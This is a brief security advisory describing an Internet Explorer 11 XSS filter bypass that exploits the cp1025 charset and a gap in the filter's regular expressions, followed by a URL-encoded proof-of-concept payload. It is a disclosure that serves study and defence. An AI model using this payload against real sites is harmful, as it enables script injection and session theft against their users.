#Vulnerability: IE 11 XSS Filter Bypass
#Impact: Moderate
#Authors: Rafay Baloch
#Company: RHAInfoSec
#Website: http://rafayhackingarticles.net
#version: Latest

Description

Internet explorer 11 Suffers from a XSS Filter bypass using cp1025
charset. This is highly effective when the charset has not been set by
the webmaster.
The issue occurs due to the fact that in the regular expressions
authors are trying to filter "http-equiv" instead of filtering out the
"<meta charset" keyword.

Proof of Concept

The following is the Proof of concept:
http://challenge.hackvertor.co.uk/xss.php?x=%3Cmeta%20charset=cp1025%3E%27%20L%C9%86%D9%81%D4%85%40%C9%84~[%40%D6%95%D4%96%E4%A2%85%D6%A5%C5%99~m~%60JZ^NNm^mm~mNm^mmmm~mmNmm^mmmmmm~mmmmNmm^[JMOO}}N}}]JmZNMOO}}N}}]JmmZNMOO}}N}}]JmmmmZNMO}}N}}]JmZNM[N}}]JmmmmmmZZMm]n